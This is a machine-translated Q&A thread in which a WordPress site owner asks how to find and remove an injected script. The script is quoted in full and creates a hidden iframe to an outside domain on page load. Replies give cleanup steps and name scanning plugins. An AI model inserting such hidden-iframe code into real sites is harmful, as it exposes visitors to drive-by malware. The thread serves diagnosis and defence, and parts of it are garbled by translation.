Javascript 找到iframe注入并从现场移除_Javascript_Wordpress_Iframe_Code Injection_Malware

Javascript 找到iframe注入并从现场移除

javascript wordpress iframe

Javascript 找到iframe注入并从现场移除,javascript,wordpress,iframe,code-injection,malware,Javascript,Wordpress,Iframe,Code Injection,Malware,我浏览了我的网站，注意到了以前没有的滚动检查后，我注意到有一个看不见的iFrame 在源代码页中看到iframe之后，我查看了所有的站点文件，没有找到源代码中的同一行代码我运行我的网站寻找恶意软件，但一切都是干净的。几个月前，我收到了谷歌的警告，但我的主机删除了恶意文件，谷歌批准了清理，现在仍然这样做。但现在我看到了这个不可见的对象，它有一个url 源脚本： <script language="JavaScript"> if(document.loaded) { showBr

我浏览了我的网站，注意到了以前没有的滚动

检查后，我注意到有一个看不见的iFrame

在源代码页中看到iframe之后，我查看了所有的站点文件，没有找到源代码中的同一行代码

我运行我的网站寻找恶意软件，但一切都是干净的。几个月前，我收到了谷歌的警告，但我的主机删除了恶意文件，谷歌批准了清理，现在仍然这样做。但现在我看到了这个不可见的对象，它有一个url

源脚本：

<script language="JavaScript">
if(document.loaded) {
  showBrowVer();
} else {
  if (window.addEventListener) {
    window.addEventListener('load', showBrowVer, false);
  } else {
    window.attachEvent('onload', showBrowVer);
  }
}

function showBrowVer() {
  var divTag=document.createElement('div');
  divTag.id='dt';
  document.body.appendChild(divTag);
  var js_kod2 = document.createElement('iframe');
  js_kod2.src = 'http://24corp-shop.com';
  js_kod2.width = '250px';
  js_kod2.height = '320px';
  js_kod2.setAttribute('style','visibility:hidden');
  document.getElementById('dt').appendChild(js_kod2);
}
</script>


if（document.loaded）{
showBrowVer（）；
}否则{
if（window.addEventListener）{
window.addEventListener（'load'，showBrowVer，false）；
}否则{
window.attachEvent（'onload'，showBrowVer）；
}
}
函数showBrowVer（）{
var divTag=document.createElement（'div'）；
divTag.id='dt'；
document.body.appendChild（divTag）；
var js_kod2=document.createElement（'iframe'）；
js_kod2.src=http://24corp-shop.com';
js_kod2.width='250px'；
js_kod2.height='320px'；
setAttribute（'style'，'visibility:hidden'）；
document.getElementById（'dt'）.appendChild（js_kod2）；
}

我看到它是由

wp_head（）引入的
有人有没有关于寻找这种注射以手动将其从我的WP站点中删除的技巧？
WP\u head（）本身并没有被用于传播您站点中的“恶意”代码。该代码不在wp_head（）上的其他位置
1-对当前站点进行完整备份（数据库+文件）
2-停用所有插件，查看恶意代码是否仍然存在。
2-如果恶意代码仍然存在，则检查您的主题文件夹。在默认主题上，转到functions.php并在该文件中搜索该代码或base64加密代码、eval、includes等。
3-如果恶意代码不存在，在您停用所有插件后，这意味着恶意代码位于其中一个插件上
使用分治方法首先查找安装恶意代码的插件，然后识别包含恶意代码的文件。
免费WP主题/插件因使用base64_编码在源代码中“隐藏”恶意或不需要的代码而臭名昭著。基本上，它们将编码文本存储在其中一个文件中，然后base64_对其进行解码并将结果呈现为html。我会尝试在源代码中搜索base64_解码，看看是否正在进行 我也有同样的问题。在主题目录和核心文件中，许多文件都经过了调整。
导致问题的主要原因（iframe代码正好在标记之前被注入）是根文件夹中的index.php。
有一个伪“eAccelerate”代码注入编码的iframe
我能够通过WordFence插件检测到，它给了我一个被篡改文件的列表
我正在调查该网站是如何被黑客入侵的，因为我有最新版本的WP和插件，有什么想法吗？
禁用所有插件，看看是不是其中一个添加了它。如果是，则逐个激活每个插件，直到它再次出现。您是否在浏览器中看到此代码，或者它是否包含在web服务器的源代码中？是否在浏览器中看到。我一个接一个地停用了所有的插件，但它仍然在那里。你找到正确答案了吗？它的可能副本不是任何插件的一部分。你的意思是，为了这个特定的代码，一个文件夹一个文件地处理这个文件夹？在每个文件中是否有我应该尝试查找的特定关键字或短语？iframe？js_kods？安装两个插件，帮助您更轻松地找到恶意代码的安装位置。-利用Scanner（）-GOTMLS（）这个伟大的插件。它提出了许多base64、eval和可见性：隐藏线。但是没有任何东西看起来像我的源代码破解行。只是仔细查看了一些站点文件，发现一行代码隐藏在右侧！！这可能是什么吗？我绝对没有把它放在那里。在我的主题文件夹的admin.php中发现了这段奇怪的代码。查看了我的主题的旧备份，该文件以前从未出现在我的备份中。所以我从我的ftp中删除了这个文件，但仍然没有对iframe进行任何更改。所以使用下面的插件，我得到了许多基线。我将如何尝试搜索base64？抱歉，我不确定这是什么。所以我想你已经使用了漏洞扫描程序（因为这是一个扫描base64加密脚本的插件）。您现在唯一能做的就是手动扫描每个base64报告的文件（如果您认为可以的话，您应该自己扫描）。如果你认为你自己做不到，把漏洞扫描报告的日志贴在这里，看看我能做些什么。用于自动解决您的问题，尽管您甚至可以使用GOTMLS。它集成了一个反病毒软件，可以扫描shell脚本并在发现时对其进行元素化。你只需要将你的插件连接到GOTMLS系统，所以我基本上解决了这个问题，至少现在是这样。我今天用mind比较了原始WP文件，注意到滚动条右侧隐藏了新的代码行。黑客在“themes”、“uploads”中的几个文件中进行攻击，主要的麻烦制造者就在我的WP根目录中，隐藏在index和info.php中。可惜没有一个恶意软件插件能够识别正确的文件。我很高兴现在结束了。